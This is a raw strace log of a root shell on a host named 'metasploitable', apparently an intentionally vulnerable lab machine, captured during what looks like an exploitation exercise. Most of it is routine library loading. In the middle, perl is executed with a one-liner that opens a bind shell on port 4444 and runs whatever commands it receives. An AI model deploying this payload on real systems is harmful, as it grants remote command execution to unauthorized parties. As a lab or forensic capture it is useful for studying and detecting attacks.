12648 07:43:28.238746 open("/etc/ld.so.cache", O_RDONLY) = 1

12648 07:43:28.238758 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12648 07:43:28.238774 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f28000

12648 07:43:28.238784 close(1)          = 0

12648 07:43:28.238794 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12648 07:43:28.238809 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

12648 07:43:28.238823 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

12648 07:43:28.238925 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

12648 07:43:28.238944 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d78000

12648 07:43:28.238956 mmap2(0xb7d80000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d80000

12648 07:43:28.238972 close(1)          = 0

12648 07:43:28.238985 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12648 07:43:28.238999 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

12648 07:43:28.239013 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

12648 07:43:28.239107 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

12648 07:43:28.239124 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d6d000

12648 07:43:28.239135 mmap2(0xb7d76000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d76000

12648 07:43:28.239152 close(1)          = 0

12648 07:43:28.239173 munmap(0xb7f28000, 29913) = 0

12648 07:43:28.239190 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

12648 07:43:28.239205 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

12648 07:43:28.239217 _llseek(1, 0, [0], SEEK_CUR) = 0

12648 07:43:28.239229 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

12648 07:43:28.239245 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f2f000

12648 07:43:28.239256 _llseek(1, 1624, [1624], SEEK_SET) = 0

12648 07:43:28.239270 munmap(0xb7f2f000, 1624) = 0

12648 07:43:28.239280 close(1)          = 0

12648 07:43:28.239309 getpgrp()         = 3831

12648 07:43:28.239319 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

12648 07:43:28.239334 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

12648 07:43:28.239350 brk(0x8101000)    = 0x8101000

12648 07:43:28.239381 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12648 07:43:28.239395 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12648 07:43:28.239419 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12648 07:43:28.239457 brk(0x8102000)    = 0x8102000

12648 07:43:28.239484 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12648 07:43:28.239503 stat64("/sbin/AB", 0xbf9ef848) = -1 ENOENT (No such file or directory)

12648 07:43:28.239515 stat64("/bin/AB", 0xbf9ef848) = -1 ENOENT (No such file or directory)

12648 07:43:28.239526 stat64("/usr/sbin/AB", 0xbf9ef848) = -1 ENOENT (No such file or directory)

12648 07:43:28.239538 stat64("/usr/bin/AB", 0xbf9ef848) = -1 ENOENT (No such file or directory)

12648 07:43:28.239552 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

12648 07:43:28.239566 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7da36f8) = 12649

12649 07:43:28.239610 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12649 07:43:28.239626 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

12649 07:43:28.239639 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

12649 07:43:28.239651 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

12649 07:43:28.239666 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12649 07:43:28.239682 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12649 07:43:28.239695 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

12649 07:43:28.239749 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

12649 07:43:28.239763 --- SIGPIPE (Broken pipe) @ 0 (0) ---

12649 07:43:28.239830 exit_group(127)   = ?

12648 07:43:28.275586 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12648 07:43:28.275586 --- SIGCHLD (Child exited) @ 0 (0) ---

12648 07:43:28.275586 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 12649

12648 07:43:28.275587 waitpid(-1, 0xbf9ef4c8, WNOHANG) = -1 ECHILD (No child processes)

12648 07:43:28.275587 sigreturn()       = ? (mask now [])

12648 07:43:28.275595 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

12648 07:43:28.275611 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12648 07:43:28.275622 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

12648 07:43:28.275635 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

12648 07:43:28.275661 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12648 07:43:28.275672 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

12648 07:43:28.275709 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12648 07:43:28.275730 stat64("/sbin/perl", 0xbf9ef878) = -1 ENOENT (No such file or directory)

12648 07:43:28.275742 stat64("/bin/perl", 0xbf9ef878) = -1 ENOENT (No such file or directory)

12648 07:43:28.275753 stat64("/usr/sbin/perl", 0xbf9ef878) = -1 ENOENT (No such file or directory)

12648 07:43:28.275765 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

12648 07:43:28.275783 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

12648 07:43:28.275808 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

12648 07:43:28.275822 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7da36f8) = 12650

12650 07:43:28.275874 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12650 07:43:28.275890 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

12650 07:43:28.275903 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

12650 07:43:28.275925 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

12650 07:43:28.275943 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12650 07:43:28.275959 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12650 07:43:28.275971 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

12650 07:43:28.276006 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

12650 07:43:28.276096 brk(0)            = 0x8153000

12650 07:43:28.276116 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12650 07:43:28.276132 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f66000

12650 07:43:28.276148 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

12650 07:43:28.276166 open("/etc/ld.so.cache", O_RDONLY) = 1

12650 07:43:28.276179 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12650 07:43:28.276196 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f5e000

12650 07:43:28.276207 close(1)          = 0

12650 07:43:28.276217 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12650 07:43:28.276233 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

12650 07:43:28.276247 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

12650 07:43:28.276339 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

12650 07:43:28.276356 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f5a000

12650 07:43:28.276368 mmap2(0xb7f5c000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f5c000

12650 07:43:28.276384 close(1)          = 0

12650 07:43:28.276396 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12650 07:43:28.276496 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

12650 07:43:28.276514 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

12650 07:43:28.276602 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

12650 07:43:28.276619 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f35000

12650 07:43:28.276631 mmap2(0xb7f58000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f58000

12650 07:43:28.276647 close(1)          = 0

12650 07:43:28.276659 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12650 07:43:28.276673 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

12650 07:43:28.276686 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

12650 07:43:28.276773 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

12650 07:43:28.276790 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f34000

12650 07:43:28.276802 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f1c000

12650 07:43:28.276813 mmap2(0xb7f30000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f30000

12650 07:43:28.276828 mmap2(0xb7f32000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f32000

12650 07:43:28.276842 close(1)          = 0

12650 07:43:28.276854 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12650 07:43:28.276867 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

12650 07:43:28.276881 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

12650 07:43:28.276972 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

12650 07:43:28.276997 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dcd000

12650 07:43:28.277048 mmap2(0xb7f16000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f16000

12650 07:43:28.277063 mmap2(0xb7f19000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f19000

12650 07:43:28.277077 close(1)          = 0

12650 07:43:28.277089 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12650 07:43:28.277103 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

12650 07:43:28.277117 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

12650 07:43:28.277207 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

12650 07:43:28.277224 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d9b000

12650 07:43:28.277234 mmap2(0xb7da4000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7da4000

12650 07:43:28.277249 mmap2(0xb7da6000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7da6000

12650 07:43:28.277263 close(1)          = 0

12650 07:43:28.277286 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d9a000

12650 07:43:28.277299 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d9a8c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

12650 07:43:28.277360 mprotect(0xb7f16000, 4096, PROT_READ) = 0

12650 07:43:28.277387 munmap(0xb7f5e000, 29913) = 0

12650 07:43:28.277399 set_tid_address(0xb7d9a908) = 12650

12650 07:43:28.277409 set_robust_list(0xb7d9a910, 0xc) = 0

12650 07:43:28.277418 futex(0xbf99e640, 0x81 /* FUTEX_??? */, 1) = 0

12650 07:43:28.277432 rt_sigaction(SIGRTMIN, {0xb7f202c0, [], SA_SIGINFO}, NULL, 8) = 0

12650 07:43:28.277445 rt_sigaction(SIGRT_1, {0xb7f20340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

12650 07:43:28.277458 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

12650 07:43:28.277472 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

12650 07:43:28.277500 uname({sys="Linux", node="metasploitable", ...}) = 0

12650 07:43:28.277552 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

12650 07:43:28.277598 brk(0)            = 0x8153000

12650 07:43:28.277608 brk(0x8174000)    = 0x8174000

12650 07:43:28.277652 getuid32()        = 0

12650 07:43:28.277662 geteuid32()       = 0

12650 07:43:28.277671 getgid32()        = 0

12650 07:43:28.277680 getegid32()       = 0

12650 07:43:28.277717 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d79000

12650 07:43:28.277744 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

12650 07:43:28.277761 read(1, "c\337\242\316", 4) = 4

12650 07:43:28.277775 close(1)          = 0

12650 07:43:28.277793 time(NULL)        = 1495626208

12650 07:43:28.277837 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbf99e310) = -1 ENOENT (No such file or directory)

12650 07:43:28.277854 stat64("/usr/local/lib/site_perl/5.8.8", 0xbf99e310) = -1 ENOENT (No such file or directory)

12650 07:43:28.277867 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbf99e310) = -1 ENOENT (No such file or directory)

12650 07:43:28.277883 stat64("/usr/local/lib/perl/5.8.7", 0xbf99e450) = -1 ENOENT (No such file or directory)

12650 07:43:28.277895 stat64("/usr/local/share/perl/5.8.7", 0xbf99e450) = -1 ENOENT (No such file or directory)

12650 07:43:28.277908 stat64("/usr/local/lib/perl/5.8.6", 0xbf99e450) = -1 ENOENT (No such file or directory)

12650 07:43:28.277919 stat64("/usr/local/share/perl/5.8.6", 0xbf99e450) = -1 ENOENT (No such file or directory)

12650 07:43:28.277931 stat64("/usr/local/lib/perl/5.8.4", 0xbf99e450) = -1 ENOENT (No such file or directory)

